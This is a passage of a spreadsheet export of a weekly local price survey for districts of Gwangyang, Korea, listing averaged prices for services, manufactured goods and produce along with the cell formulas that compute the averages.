[40,"이용료(컷트)","성인조발 중류급 1회",6,6,{"v":12833.333333333334,"d":"12,833"},{"v":12833.333333333334,"d":"12,833"},0,0,{"v":11000,"d":"11,000"},{"v":11000,"d":"11,000"},0,{"v":12000,"d":"12,000"},{"v":12000,"d":"12,000"},0,{"v":14000,"d":"14,000"},{"v":14000,"d":"14,000"},0,{"v":13000,"d":"13,000"},{"v":13000,"d":"13,000"},0,{"v":13000,"d":"13,000"},{"v":13000,"d":"13,000"},0,{"v":14000,"d":"14,000"},{"v":14000,"d":"14,000"},0]
[41,"미용료","성인여자 파마(일반)",6,6,{"v":32500,"d":"32,500"},{"v":32500,"d":"32,500"},0,0,{"v":37500,"d":"37,500"},{"v":37500,"d":"37,500"},0,{"v":25000,"d":"25,000"},{"v":25000,"d":"25,000"},0,{"v":35000,"d":"35,000"},{"v":35000,"d":"35,000"},0,{"v":35000,"d":"35,000"},{"v":35000,"d":"35,000"},0,{"v":30000,"d":"30,000"},{"v":30000,"d":"30,000"},0,{"v":32500,"d":"32,500"},{"v":32500,"d":"32,500"},0]
[42,"목욕료\n(성인)","대중탕(성인 1회)\n(1회용품 제외)",6,6,{"v":5000,"d":"5,000"},{"v":5000,"d":"5,000"},0,0,{"v":5000,"d":"5,000"},{"v":5000,"d":"5,000"},0,{"v":5500,"d":"5,500"},{"v":5500,"d":"5,500"},0,{"v":5000,"d":"5,000"},{"v":5000,"d":"5,000"},0,{"v":5000,"d":"5,000"},{"v":5000,"d":"5,000"},0,{"v":5500,"d":"5,500"},{"v":5500,"d":"5,500"},0,{"v":4000,"d":"4,000"},{"v":4000,"d":"4,000"},0]
[43,"숙박료\n(호텔)","평일, 스탠다드,부가세 및 봉사료 포함",2,2,{"v":49750,"d":"49,750"},{"v":49750,"d":"49,750"},0,0,{"v":69500,"d":"69,500"},{"v":69500,"d":"69,500"},0,{"v":30000,"d":"30,000"},{"v":30000,"d":"30,000"},0,0,0,0,0,0,0,0,0,0,0,0,0]
[44,"숙박료\n(여관)","독방, 1박, 욕탕부설",5,5,{"v":36000,"d":"36,000"},{"v":36000,"d":"36,000"},0,0,{"v":37500,"d":"37,500"},{"v":37500,"d":"37,500"},0,{"v":30000,"d":"30,000"},{"v":30000,"d":"30,000"},0,{"v":37500,"d":"37,500"},{"v":37500,"d":"37,500"},0,{"v":40000,"d":"40,000"},{"v":40000,"d":"40,000"},0,{"v":35000,"d":"35,000"},{"v":35000,"d":"35,000"},0,0,0,0]
[45,"콘도미니엄\n이용료","25평정도 회원기준\n1실 1일 사용",0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]
[46,"PC방\n이용료","1회 이용시",6,6,{"v":1183.3333333333333,"d":"1,183"},{"v":1183.3333333333333,"d":"1,183"},0,0,{"v":1200,"d":"1,200"},{"v":1200,"d":"1,200"},0,{"v":1300,"d":"1,300"},{"v":1300,"d":"1,300"},0,{"v":1200,"d":"1,200"},{"v":1200,"d":"1,200"},0,{"v":1200,"d":"1,200"},{"v":1200,"d":"1,200"},0,{"v":1000,"d":"1,000"},{"v":1000,"d":"1,000"},0,{"v":1200,"d":"1,200"},{"v":1200,"d":"1,200"},0]
[47,"택배이용료","20kg이하, 타지역",6,6,{"v":5875,"d":"5,875"},{"v":5875,"d":"5,875"},0,0,{"v":5500,"d":"5,500"},{"v":5500,"d":"5,500"},0,{"v":6000,"d":"6,000"},{"v":6000,"d":"6,000"},0,{"v":6250,"d":"6,250"},{"v":6250,"d":"6,250"},0,{"v":6000,"d":"6,000"},{"v":6000,"d":"6,000"},0,{"v":5000,"d":"5,000"},{"v":5000,"d":"5,000"},0,{"v":6500,"d":"6,500"},{"v":6500,"d":"6,500"},0]
[48,"찜질방\n이용료","찜질방(성인 1회)\n(1회용품 제외)",1,1,{"v":8000,"d":"8,000"},{"v":8000,"d":"8,000"},0,0,0,0,0,0,0,0,0,0,0,0,0,0,{"v":8000,"d":"8,000"},{"v":8000,"d":"8,000"},0,0,0,0]
[49,"대입학원비(종합)","대입(4년제)재수생 종합반 수강료",0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]
["공산품 등 기타(13개품목)"]
[1,"밀가루","중력분 1등품\n(1봉지 3kg)",{"$f":"COUNTIF(J86,\"<>0\")+COUNTIF(M86,\"<>0\")+COUNTIF(P86,\"<>0\")+COUNTIF(S86,\"<>0\")+COUNTIF(V86,\"<>0\")+COUNTIF(Y86,\"<>0\")","v":6},{"$f":"COUNTIF(K86,\"<>0\")+COUNTIF(N86,\"<>0\")+COUNTIF(Q86,\"<>0\")+COUNTIF(T86,\"<>0\")+COUNTIF(W86,\"<>0\")+COUNTIF(Z86,\"<>0\")","v":6},{"$f":"IF(D86=0,0,SUM(J86,M86,P86,S86,V86,Y86)/D86)","v":{"v":5950.833333333333,"d":"5,951"}},{"$f":"IF(E86=0,0,SUM(K86,N86,Q86,T86,W86,Z86)/E86)","v":{"v":5950.833333333333,"d":"5,951"}},{"$f":"SUM(G86-F86)","v":0},{"$f":"IF(F86=0,0,((G86-F86)/F86))","v":0},{"$f":"광양읍1!F86","v":{"v":5470,"d":"5,470"}},{"$f":"광양읍1!G86","v":{"v":5470,"d":"5,470"}},{"$f":"광양읍1!H86","v":0},{"$f":"광양읍2!F86","v":{"v":6050,"d":"6,050"}},{"$f":"광양읍2!G86","v":{"v":6050,"d":"6,050"}},{"$f":"광양읍2!H86","v":0},{"$f":"중마동1!F86","v":{"v":5700,"d":"5,700"}},{"$f":"중마동1!G86","v":{"v":5700,"d":"5,700"}},{"$f":"중마동1!H86","v":0},{"$f":"중마동2!F86","v":{"v":6800,"d":"6,800"}},{"$f":"중마동2!G86","v":{"v":6800,"d":"6,800"}},{"$f":"중마동2!H86","v":0},{"$f":"광영동!F86","v":{"v":5625,"d":"5,625"}},{"$f":"광영동!G86","v":{"v":5625,"d":"5,625"}},{"$f":"광영동!H86","v":0},{"$f":"금호동!F86","v":{"v":6060,"d":"6,060"}},{"$f":"금호동!G86","v":{"v":6060,"d":"6,060"}},{"$f":"금호동!H86","v":0}]
[2,"두부","공장제품 1모",{"$f":"COUNTIF(J87,\"<>0\")+COUNTIF(M87,\"<>0\")+COUNTIF(P87,\"<>0\")+COUNTIF(S87,\"<>0\")+COUNTIF(V87,\"<>0\")+COUNTIF(Y87,\"<>0\")","v":6},6,{"$f":"IF(D87=0,0,SUM(J87,M87,P87,S87,V87,Y87)/D87)","v":{"v":1409.1666666666667,"d":"1,409"}},{"v":1409.1666666666667,"d":"1,409"},{"$f":"SUM(G87-F87)","v":0},{"$f":"IF(F87=0,0,((G87-F87)/F87))","v":0},{"$f":"광양읍1!F87","v":{"v":1450,"d":"1,450"}},{"$f":"광양읍1!G87","v":{"v":1450,"d":"1,450"}},{"$f":"광양읍1!H87","v":0},{"$f":"광양읍2!F87","v":{"v":1475,"d":"1,475"}},{"$f":"광양읍2!G87","v":{"v":1475,"d":"1,475"}},{"$f":"광양읍2!H87","v":0},{"$f":"중마동1!F87","v":{"v":1365,"d":"1,365"}},{"$f":"중마동1!G87","v":{"v":1365,"d":"1,365"}},{"$f":"중마동1!H87","v":0},{"$f":"중마동2!F87","v":{"v":1425,"d":"1,425"}},{"$f":"중마동2!G87","v":{"v":1425,"d":"1,425"}},{"$f":"중마동2!H87","v":0},{"$f":"광영동!F87","v":{"v":1190,"d":"1,190"}},{"$f":"광영동!G87","v":{"v":1190,"d":"1,190"}},{"$f":"광영동!H87","v":0},{"$f":"금호동!F87","v":{"v":1550,"d":"1,550"}},{"$f":"금호동!G87","v":{"v":1550,"d":"1,550"}},{"$f":"금호동!H87","v":0}]
[3,"우유","흰 우유(종이팩) 1개\n200㎖",6,6,{"v":1033.3333333333333,"d":"1,033"},{"v":1033.3333333333333,"d":"1,033"},0,0,{"$f":"광양읍1!F88","v":990},{"$f":"광양읍1!G88","v":990},{"$f":"광양읍1!H88","v":0},{"$f":"광양읍2!F88","v":{"v":1100,"d":"1,100"}},{"$f":"광양읍2!G88","v":{"v":1100,"d":"1,100"}},{"$f":"광양읍2!H88","v":0},{"$f":"중마동1!F88","v":970},{"$f":"중마동1!G88","v":970},{"$f":"중마동1!H88","v":0},{"$f":"중마동2!F88","v":{"v":1050,"d":"1,050"}},{"$f":"중마동2!G88","v":{"v":1050,"d":"1,050"}},{"$f":"중마동2!H88","v":0},{"$f":"광영동!F88","v":{"v":1045,"d":"1,045"}},{"$f":"광영동!G88","v":{"v":1045,"d":"1,045"}},{"$f":"광영동!H88","v":0},{"$f":"금호동!F88","v":{"v":1045,"d":"1,045"}},{"$f":"금호동!G88","v":{"v":1045,"d":"1,045"}},{"$f":"금호동!H88","v":0}]
[4,"식용유","콩기름 1.8ml",6,6,{"v":8662.5,"d":"8,663"},{"v":8745.833333333334,"d":"8,746"},{"v":83.33333333333394,"d":"83"},{"v":0.00962000962000969,"d":"0"},{"$f":"광양읍1!F89","v":{"v":8485,"d":"8,485"}},{"$f":"광양읍1!G89","v":{"v":8485,"d":"8,485"}},{"$f":"광양읍1!H89","v":0},{"$f":"광양읍2!F89","v":{"v":9000,"d":"9,000"}},{"$f":"광양읍2!G89","v":{"v":9000,"d":"9,000"}},{"$f":"광양읍2!H89","v":0},{"$f":"중마동1!F89","v":{"v":8080,"d":"8,080"}},{"$f":"중마동1!G89","v":{"v":8080,"d":"8,080"}},{"$f":"중마동1!H89","v":0},{"$f":"중마동2!F89","v":{"v":10265,"d":"10,265"}},{"$f":"중마동2!G89","v":{"v":10265,"d":"10,265"}},{"$f":"중마동2!H89","v":0},{"$f":"광영동!F89","v":{"v":7730,"d":"7,730"}},{"$f":"광영동!G89","v":{"v":8230,"d":"8,230"}},{"$f":"광영동!H89","v":500},{"$f":"금호동!F89","v":{"v":8415,"d":"8,415"}},{"$f":"금호동!G89","v":{"v":8415,"d":"8,415"}},{"$f":"금호동!H89","v":0}]
[5,"설탕","정백당 1kg",6,6,{"v":2217.5,"d":"2,218"},{"v":2217.5,"d":"2,218"},0,0,{"$f":"광양읍1!F90","v":{"v":1835,"d":"1,835"}},{"$f":"광양읍1!G90","v":{"v":1835,"d":"1,835"}},{"$f":"광양읍1!H90","v":0},{"$f":"광양읍2!F90","v":{"v":2500,"d":"2,500"}},{"$f":"광양읍2!G90","v":{"v":2500,"d":"2,500"}},{"$f":"광양읍2!H90","v":0},{"$f":"중마동1!F90","v":{"v":1980,"d":"1,980"}},{"$f":"중마동1!G90","v":{"v":1980,"d":"1,980"}},{"$f":"중마동1!H90","v":0},{"$f":"중마동2!F90","v":{"v":2410,"d":"2,410"}},{"$f":"중마동2!G90","v":{"v":2410,"d":"2,410"}},{"$f":"중마동2!H90","v":0},{"$f":"광영동!F90","v":{"v":2240,"d":"2,240"}},{"$f":"광영동!G90","v":{"v":2240,"d":"2,240"}},{"$f":"광영동!H90","v":0},{"$f":"금호동!F90","v":{"v":2340,"d":"2,340"}},{"$f":"금호동!G90","v":{"v":2340,"d":"2,340"}},{"$f":"금호동!H90","v":0}]
[6,"생수","플라스틱 1병(500㎖)",6,6,{"v":458.3333333333333,"d":"458"},{"v":458.3333333333333,"d":"458"},0,0,{"$f":"광양읍1!F91","v":320},{"$f":"광양읍1!G91","v":320},{"$f":"광양읍1!H91","v":0},{"$f":"광양읍2!F91","v":400},{"$f":"광양읍2!G91","v":400},{"$f":"광양읍2!H91","v":0},{"$f":"중마동1!F91","v":455},{"$f":"중마동1!G91","v":455},{"$f":"중마동1!H91","v":0},{"$f":"중마동2!F91","v":540},{"$f":"중마동2!G91","v":540},{"$f":"중마동2!H91","v":0},{"$f":"광영동!F91","v":515},{"$f":"광영동!G91","v":515},{"$f":"광영동!H91","v":0},{"$f":"금호동!F91","v":520},{"$f":"금호동!G91","v":520},{"$f":"금호동!H91","v":0}]
[7,"맥주","1병 500㎖\n(병 보증금 포함)",6,6,{"v":1686.6666666666667,"d":"1,687"},{"v":1686.6666666666667,"d":"1,687"},0,0,{"$f":"광양읍1!F92","v":{"v":1540,"d":"1,540"}},{"$f":"광양읍1!G92","v":{"v":1540,"d":"1,540"}},{"$f":"광양읍1!H92","v":0},{"$f":"광양읍2!F92","v":{"v":1700,"d":"1,700"}},{"$f":"광양읍2!G92","v":{"v":1700,"d":"1,700"}},{"$f":"광양읍2!H92","v":0},{"$f":"중마동1!F92","v":{"v":1695,"d":"1,695"}},{"$f":"중마동1!G92","v":{"v":1695,"d":"1,695"}},{"$f":"중마동1!H92","v":0},{"$f":"중마동2!F92","v":{"v":1820,"d":"1,820"}},{"$f":"중마동2!G92","v":{"v":1820,"d":"1,820"}},{"$f":"중마동2!H92","v":0},{"$f":"광영동!F92","v":{"v":1600,"d":"1,600"}},{"$f":"광영동!G92","v":{"v":1600,"d":"1,600"}},{"$f":"광영동!H92","v":0},{"$f":"금호동!F92","v":{"v":1765,"d":"1,765"}},{"$f":"금호동!G92","v":{"v":1765,"d":"1,765"}},{"$f":"금호동!H92","v":0}]
[8,"소주","1병 360㎖\n(병 보증금 포함)",6,6,{"v":1434.1666666666667,"d":"1,434"},{"v":1438.3333333333333,"d":"1,438"},{"v":4.166666666666515,"d":"4"},{"v":0.002905287623474618,"d":"0"},{"$f":"광양읍1!F93","v":{"v":1380,"d":"1,380"}},{"$f":"광양읍1!G93","v":{"v":1405,"d":"1,405"}},{"$f":"광양읍1!H93","v":25},{"$f":"광양읍2!F93","v":{"v":1525,"d":"1,525"}},{"$f":"광양읍2!G93","v":{"v":1525,"d":"1,525"}},{"$f":"광양읍2!H93","v":0},{"$f":"중마동1!F93","v":{"v":1385,"d":"1,385"}},{"$f":"중마동1!G93","v":{"v":1385,"d":"1,385"}},{"$f":"중마동1!H93","v":0},{"$f":"중마동2!F93","v":{"v":1525,"d":"1,525"}},{"$f":"중마동2!G93","v":{"v":1525,"d":"1,525"}},{"$f":"중마동2!H93","v":0},{"$f":"광영동!F93","v":{"v":1395,"d":"1,395"}},{"$f":"광영동!G93","v":{"v":1395,"d":"1,395"}},{"$f":"광영동!H93","v":0},{"$f":"금호동!F93","v":{"v":1395,"d":"1,395"}},{"$f":"금호동!G93","v":{"v":1395,"d":"1,395"}},{"$f":"금호동!H93","v":0}]
[9,"등유","주유소  1ℓ",3,3,{"v":1483.3333333333333,"d":"1,483"},{"v":1483.3333333333333,"d":"1,483"},0,0,{"$f":"광양읍1!F94","v":{"v":1400,"d":"1,400"}},{"$f":"광양읍1!G94","v":{"v":1400,"d":"1,400"}},{"$f":"광양읍1!H94","v":0},{"$f":"광양읍2!F94","v":{"v":1450,"d":"1,450"}},{"$f":"광양읍2!G94","v":{"v":1450,"d":"1,450"}},{"$f":"광양읍2!H94","v":0},{"$f":"중마동1!F94","v":{"v":1600,"d":"1,600"}},{"$f":"중마동1!G94","v":{"v":1600,"d":"1,600"}},{"$f":"중마동1!H94","v":0},{"$f":"중마동2!F94","v":0},{"$f":"중마동2!G94","v":0},{"$f":"중마동2!H94","v":0},{"$f":"광영동!F94","v":0},{"$f":"광영동!G94","v":0},{"$f":"광영동!H94","v":0},{"$f":"금호동!F94","v":0},{"$f":"금호동!G94","v":0},{"$f":"금호동!H94","v":0}]
[10,"경유","주유소  1ℓ",5,5,{"v":1545.8,"d":"1,546"},{"v":1545.8,"d":"1,546"},0,0,{"$f":"광양읍1!F95","v":{"v":1527,"d":"1,527"}},{"$f":"광양읍1!G95","v":{"v":1527,"d":"1,527"}},{"$f":"광양읍1!H95","v":0},{"$f":"광양읍2!F95","v":{"v":1541.5,"d":"1,542"}},{"$f":"광양읍2!G95","v":{"v":1541.5,"d":"1,542"}},{"$f":"광양읍2!H95","v":0},{"$f":"중마동1!F95","v":{"v":1558.5,"d":"1,559"}},{"$f":"중마동1!G95","v":{"v":1558.5,"d":"1,559"}},{"$f":"중마동1!H95","v":0},{"$f":"중마동2!F95","v":{"v":1553,"d":"1,553"}},{"$f":"중마동2!G95","v":{"v":1553,"d":"1,553"}},{"$f":"중마동2!H95","v":0},{"$f":"광영동!F95","v":{"v":1549,"d":"1,549"}},{"$f":"광영동!G95","v":{"v":1549,"d":"1,549"}},{"$f":"광영동!H95","v":0},{"$f":"금호동!F95","v":0},{"$f":"금호동!G95","v":0},{"$f":"금호동!H95","v":0}]
[11,"휘발유","주유소  1ℓ\n(무연)",5,5,{"v":1658.7,"d":"1,659"},{"$f":"IF(E96=0,0,SUM(K96,N96,Q96,T96,W96,Z96)/E96)","v":{"v":1655.8,"d":"1,656"}},{"$f":"SUM(G96-F96)","v":{"v":-2.900000000000091,"d":"-3"}},{"v":-0.001748357147163496,"d":"-0"},{"$f":"광양읍1!F96","v":{"v":1642,"d":"1,642"}},{"$f":"광양읍1!G96","v":{"v":1642,"d":"1,642"}},{"$f":"광양읍1!H96","v":0},{"$f":"광양읍2!F96","v":{"v":1656.5,"d":"1,657"}},{"$f":"광양읍2!G96","v":{"v":1656.5,"d":"1,657"}},{"$f":"광양읍2!H96","v":0},{"$f":"중마동1!F96","v":{"v":1678.5,"d":"1,679"}},{"$f":"중마동1!G96","v":{"v":1678.5,"d":"1,679"}},{"$f":"중마동1!H96","v":0},{"$f":"중마동2!F96","v":{"v":1658,"d":"1,658"}},{"$f":"중마동2!G96","v":{"v":1658,"d":"1,658"}},{"$f":"중마동2!H96","v":0},{"$f":"광영동!F96","v":{"v":1658.5,"d":"1,659"}},{"$f":"광영동!G96","v":{"v":1644,"d":"1,644"}},{"$f":"광영동!H96","v":{"v":-14.5,"d":"-15"}},{"$f":"금호동!F96","v":0},{"$f":"금호동!G96","v":0},0]
[12,"피아노\n학원비","관인학원\n(초급반 1개월)",6,6,{"v":138333.33333333334,"d":"138,333"},{"v":138333.33333333334,"d":"138,333"},0,0,{"$f":"광양읍1!F97","v":{"v":130000,"d":"130,000"}},{"$f":"광양읍1!G97","v":{"v":130000,"d":"130,000"}},{"$f":"광양읍1!H97","v":0},{"$f":"광양읍2!F97","v":{"v":140000,"d":"140,000"}},{"$f":"광양읍2!G97","v":{"v":140000,"d":"140,000"}},{"$f":"광양읍2!H97","v":0},{"$f":"중마동1!F97","v":{"v":150000,"d":"150,000"}},{"$f":"중마동1!G97","v":{"v":150000,"d":"150,000"}},{"$f":"중마동1!H97","v":0},{"$f":"중마동2!F97","v":{"v":150000,"d":"150,000"}},{"$f":"중마동2!G97","v":{"v":150000,"d":"150,000"}},{"$f":"중마동2!H97","v":0},{"$f":"광영동!F97","v":{"v":140000,"d":"140,000"}},{"$f":"광영동!G97","v":{"v":140000,"d":"140,000"}},{"$f":"광영동!H97","v":0},{"$f":"금호동!F97","v":{"v":120000,"d":"120,000"}},{"$f":"금호동!G97","v":{"v":120000,"d":"120,000"}},{"$f":"금호동!H97","v":0}]
[13,"미술학원비","초등 저학년 1개월\n(재료비 포함)",6,6,{"v":130833.33333333333,"d":"130,833"},{"v":130833.33333333333,"d":"130,833"},0,0,{"$f":"광양읍1!F98","v":{"v":145000,"d":"145,000"}},{"$f":"광양읍1!G98","v":{"v":145000,"d":"145,000"}},{"$f":"광양읍1!H98","v":0},{"$f":"광양읍2!F98","v":{"v":135000,"d":"135,000"}},{"$f":"광양읍2!G98","v":{"v":135000,"d":"135,000"}},{"$f":"광양읍2!H98","v":0},{"$f":"중마동1!F98","v":{"v":155000,"d":"155,000"}},{"$f":"중마동1!G98","v":{"v":155000,"d":"155,000"}},{"$f":"중마동1!H98","v":0},{"$f":"중마동2!F98","v":{"v":150000,"d":"150,000"}},{"$f":"중마동2!G98","v":{"v":150000,"d":"150,000"}},{"$f":"중마동2!H98","v":0},{"$f":"광영동!F98","v":{"v":120000,"d":"120,000"}},{"$f":"광영동!G98","v":{"v":120000,"d":"120,000"}},{"$f":"광영동!H98","v":0},{"$f":"금호동!F98","v":{"v":80000,"d":"80,000"}},{"$f":"금호동!G98","v":{"v":80000,"d":"80,000"}},{"$f":"금호동!H98","v":0}]
[]
[{"$nulls":21},{"v":1534,"d":"1,534"}]

{"sheet":"광양읍1","index":1,"n_rows":98,"n_cols":16,"rows_kept":98,"merged":[[1,0,1,15],[2,0,2,6],[2,12,2,13],[3,0,4,0],[3,1,4,1],[3,2,4,2],[3,5,3,7],[3,8,3,11],[3,12,3,15],[5,0,5,2],[34,0,34,2],[84,0,84,2]]}
[]
["주  간  물  가  동  향(광양읍)"]
[{"$nulls":12},"조사자 : 이문주"]
["연번","품목","규격·단위",null,null,"평     균",null,null,"조 사 1 지 역(농협하나로마트)",{"$nulls":3},"조 사 2 지 역(트라이얼코리아)"]
[{"$nulls":5},"금주","금주","증감액","조 사 처","전주","금주","증감액","조 사 처","전주","금주","증감액"]
["농·축·수산물(28개 품목)"]
[1,"쌀","일반미 20kg",{"$f":"COUNTIF(J7,\"<>0\")+COUNTIF(N7,\"<>0\")","v":2},{"$f":"COUNTIF(K7,\"<>0\")+COUNTIF(O7,\"<>0\")","v":2},{"$f":"IF(D7=0,0,SUM(J7,N7)/D7)","v":{"v":58750,"d":"58,750"}},{"$f":"IF(E7=0,0,SUM(K7,O7)/E7)","v":{"v":59750,"d":"59,750"}},{"$f":"G7-F7","v":{"v":1000,"d":"1,000"}},"농협하나로마트",{"v":53000,"d":"53,000"},{"v":55000,"d":"55,000"},{"$f":"K7-J7","v":{"v":2000,"d":"2,000"}},"트라이얼코리아",{"v":64500,"d":"64,500"},{"v":64500,"d":"64,500"},{"$f":"O7-N7","v":0}]
[2,"무","상품 1개(1㎏)",{"$f":"COUNTIF(J8,\"<>0\")+COUNTIF(N8,\"<>0\")","v":2},{"$f":"COUNTIF(K8,\"<>0\")+COUNTIF(O8,\"<>0\")","v":2},{"$f":"IF(D8=0,0,SUM(J8,N8)/D8)","v":{"v":1566.5,"d":"1,567"}},{"$f":"IF(E8=0,0,SUM(K8,O8)/E8)","v":{"v":1493,"d":"1,493"}},{"$f":"G8-F8","v":{"v":-73.5,"d":"-74"}},"농협하나로마트",{"v":1914,"d":"1,914"},{"v":1696,"d":"1,696"},{"$f":"K8-J8","v":-218},"트라이얼코리아",{"v":1219,"d":"1,219"},{"v":1290,"d":"1,290"},{"$f":"O8-N8","v":71}]
[3,"상추","잎상추 500g",{"$f":"COUNTIF(J9,\"<>0\")+COUNTIF(N9,\"<>0\")","v":2},{"$f":"COUNTIF(K9,\"<>0\")+COUNTIF(O9,\"<>0\")","v":2},{"$f":"IF(D9=0,0,SUM(J9,N9)/D9)","v":{"v":5290.5,"d":"5,291"}},{"$f":"IF(E9=0,0,SUM(K9,O9)/E9)","v":{"v":5517,"d":"5,517"}},{"$f":"G9-F9","v":{"v":226.5,"d":"227"}},"농협하나로마트",{"v":4120,"d":"4,120"},{"v":4573,"d":"4,573"},{"$f":"K9-J9","v":453},"트라이얼코리아",{"v":6461,"d":"6,461"},{"v":6461,"d":"6,461"},{"$f":"O9-N9","v":0}]
[4,"양상추","상품1개(350~400g)",{"$f":"COUNTIF(J10,\"<>0\")+COUNTIF(N10,\"<>0\")","v":2},{"$f":"COUNTIF(K10,\"<>0\")+COUNTIF(O10,\"<>0\")","v":2},{"$f":"IF(D10=0,0,SUM(J10,N10)/D10)","v":{"v":2708,"d":"2,708"}},{"$f":"IF(E10=0,0,SUM(K10,O10)/E10)","v":{"v":1511,"d":"1,511"}},{"$f":"G10-F10","v":{"v":-1197,"d":"-1,197"}},"농협하나로마트",{"v":2219,"d":"2,219"},{"v":1183,"d":"1,183"},{"$f":"K10-J10","v":{"v":-1036,"d":"-1,036"}},"트라이얼코리아",{"v":3197,"d":"3,197"},{"v":1839,"d":"1,839"},{"$f":"O10-N10","v":{"v":-1358,"d":"-1,358"}}]
[5,"애호박","상품1개(300~350g)",{"$f":"COUNTIF(J11,\"<>0\")+COUNTIF(N11,\"<>0\")","v":2},{"$f":"COUNTIF(K11,\"<>0\")+COUNTIF(O11,\"<>0\")","v":2},{"$f":"IF(D11=0,0,SUM(J11,N11)/D11)","v":{"v":1445,"d":"1,445"}},{"$f":"IF(E11=0,0,SUM(K11,O11)/E11)","v":{"v":1395,"d":"1,395"}},{"$f":"G11-F11","v":-50},"농협하나로마트",{"v":1400,"d":"1,400"},{"v":1300,"d":"1,300"},{"$f":"K11-J11","v":-100},"트라이얼코리아",{"v":1490,"d":"1,490"},{"v":1490,"d":"1,490"},{"$f":"O11-N11","v":0}]
[6,"열무","상품 4kg(1단)",{"$f":"COUNTIF(J12,\"<>0\")+COUNTIF(N12,\"<>0\")","v":2},{"$f":"COUNTIF(K12,\"<>0\")+COUNTIF(O12,\"<>0\")","v":2},{"$f":"IF(D12=0,0,SUM(J12,N12)/D12)","v":{"v":10952,"d":"10,952"}},{"$f":"IF(E12=0,0,SUM(K12,O12)/E12)","v":{"v":12215.5,"d":"12,216"}},{"$f":"G12-F12","v":{"v":1263.5,"d":"1,264"}},"농협하나로마트",{"v":9146,"d":"9,146"},{"v":11673,"d":"11,673"},{"$f":"K12-J12","v":{"v":2527,"d":"2,527"}},"트라이얼코리아",{"v":12758,"d":"12,758"},{"v":12758,"d":"12,758"},{"$f":"O12-N12","v":0}]
[7,"양파","1망 1kg",{"$f":"COUNTIF(J13,\"<>0\")+COUNTIF(N13,\"<>0\")","v":2},{"$f":"COUNTIF(K13,\"<>0\")+COUNTIF(O13,\"<>0\")","v":2},{"$f":"IF(D13=0,0,SUM(J13,N13)/D13)","v":{"v":3245,"d":"3,245"}},{"$f":"IF(E13=0,0,SUM(K13,O13)/E13)","v":{"v":3245,"d":"3,245"}},{"$f":"G13-F13","v":0},"농협하나로마트",{"v":3500,"d":"3,500"},{"v":3500,"d":"3,500"},{"$f":"K13-J13","v":0},"트라이얼코리아",{"v":2990,"d":"2,990"},{"v":2990,"d":"2,990"},{"$f":"O13-N13","v":0}]
[8,"오이","상품 3개",{"$f":"COUNTIF(J14,\"<>0\")+COUNTIF(N14,\"<>0\")","v":2},{"$f":"COUNTIF(K14,\"<>0\")+COUNTIF(O14,\"<>0\")","v":2},{"$f":"IF(D14=0,0,SUM(J14,N14)/D14)","v":{"v":3642.5,"d":"3,643"}},{"$f":"IF(E14=0,0,SUM(K14,O14)/E14)","v":{"v":3367.5,"d":"3,368"}},{"$f":"G14-F14","v":-275},"농협하나로마트",{"v":2800,"d":"2,800"},{"v":3000,"d":"3,000"},{"$f":"K14-J14","v":200},"트라이얼코리아",{"v":4485,"d":"4,485"},{"v":3735,"d":"3,735"},{"$f":"O14-N14","v":-750}]
[9,"풋고추","신선한것 1kg",{"$f":"COUNTIF(J15,\"<>0\")+COUNTIF(N15,\"<>0\")","v":2},{"$f":"COUNTIF(K15,\"<>0\")+COUNTIF(O15,\"<>0\")","v":2},{"$f":"IF(D15=0,0,SUM(J15,N15)/D15)","v":{"v":12403.5,"d":"12,404"}},{"$f":"IF(E15=0,0,SUM(K15,O15)/E15)","v":{"v":9711.5,"d":"9,712"}},{"$f":"G15-F15","v":{"v":-2692,"d":"-2,692"}},"농협하나로마트",{"v":9500,"d":"9,500"},{"v":9500,"d":"9,500"},{"$f":"K15-J15","v":0},"트라이얼코리아",{"v":15307,"d":"15,307"},{"v":9923,"d":"9,923"},{"$f":"O15-N15","v":{"v":-5384,"d":"-5,384"}}]
[10,"마늘","깐것 상품 1kg",{"$f":"COUNTIF(J16,\"<>0\")+COUNTIF(N16,\"<>0\")","v":2},{"$f":"COUNTIF(K16,\"<>0\")+COUNTIF(O16,\"<>0\")","v":2},{"$f":"IF(D16=0,0,SUM(J16,N16)/D16)","v":{"v":9350,"d":"9,350"}},{"$f":"IF(E16=0,0,SUM(K16,O16)/E16)","v":{"v":9350,"d":"9,350"}},{"$f":"G16-F16","v":0},"농협하나로마트",{"v":8800,"d":"8,800"},{"v":8800,"d":"8,800"},{"$f":"K16-J16","v":0},"트라이얼코리아",{"v":9900,"d":"9,900"},{"v":9900,"d":"9,900"},{"$f":"O16-N16","v":0}]
[11,"감자","흰색 1kg",{"$f":"COUNTIF(J17,\"<>0\")+COUNTIF(N17,\"<>0\")","v":2},{"$f":"COUNTIF(K17,\"<>0\")+COUNTIF(O17,\"<>0\")","v":2},{"$f":"IF(D17=0,0,SUM(J17,N17)/D17)","v":{"v":6350,"d":"6,350"}},{"$f":"IF(E17=0,0,SUM(K17,O17)/E17)","v":{"v":6350,"d":"6,350"}},{"$f":"G17-F17","v":0},"농협하나로마트",{"v":5800,"d":"5,800"},{"v":5800,"d":"5,800"},{"$f":"K17-J17","v":0},"트라이얼코리아",{"v":6900,"d":"6,900"},{"v":6900,"d":"6,900"},{"$f":"O17-N17","v":0}]
[12,"배추","1포기 3kg",{"$f":"COUNTIF(J18,\"<>0\")+COUNTIF(N18,\"<>0\")","v":2},{"$f":"COUNTIF(K18,\"<>0\")+COUNTIF(O18,\"<>0\")","v":2},{"$f":"IF(D18=0,0,SUM(J18,N18)/D18)","v":{"v":5328,"d":"5,328"}},{"$f":"IF(E18=0,0,SUM(K18,O18)/E18)","v":{"v":5328,"d":"5,328"}},{"$f":"G18-F18","v":0},"농협하나로마트",{"v":4666,"d":"4,666"},{"v":4666,"d":"4,666"},{"$f":"K18-J18","v":0},"트라이얼코리아",{"v":5990,"d":"5,990"},{"v":5990,"d":"5,990"},{"$f":"O18-N18","v":0}]
